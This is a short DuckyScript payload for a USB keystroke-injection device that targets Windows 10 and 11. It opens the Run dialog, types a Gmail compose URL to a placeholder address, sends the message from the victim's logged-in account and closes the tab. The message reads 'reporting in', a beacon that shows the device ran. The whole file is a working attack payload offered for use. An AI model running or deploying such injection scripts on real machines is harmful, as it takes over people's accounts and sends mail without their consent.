REM     Title: send email via gmail

REM     Author: findirfin

REM     Description: opens gmail and sends email

REM     Target: Windows 10, 11

REM     -----------------------------------------------------------------------------
REM     TARGET MUST TO BE LOGGED INTO GMAIL. REPLACE THE TO EMAIL
REM     -----------------------------------------------------------------------------

DELAY 2000
GUI r
DELAY 500
REM                               
STRING https://mail.google.com/mail/?view=cm&fs=1&to=TO-ADDRESS-HERE@DOMAIN.TLD&su=message%20from%20usb&body=reporting%20in
ENTER
DELAY 8000
CTRL ENTER
DELAY 500
CTRL W
DELAY 200